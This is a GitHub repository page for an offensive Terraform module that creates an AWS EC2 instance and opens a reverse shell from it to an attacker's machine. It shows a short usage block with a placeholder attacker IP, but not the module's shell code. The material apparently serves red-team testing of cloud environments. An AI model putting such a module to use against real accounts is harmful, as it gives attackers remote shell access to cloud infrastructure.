Skip to content

Latest commit

 

History

15 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

AWS EC2 Instance Reverse Shell Module

OffensiveTerraform OffensiveTerraform OffensiveTerraform

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Attack Diagram

Usage

module "ec2-instance-reverse-shell" {
    source  = "offensive-terraform/ec2-instance-reverse-shell/aws"

    subnet_id = "subnet-0a4a1cc04"
    attacker_ip = "0.0.0.0"
}

Author

Module managed by https://github.com/iganbold

About

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Topics

Resources

Stars

16 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages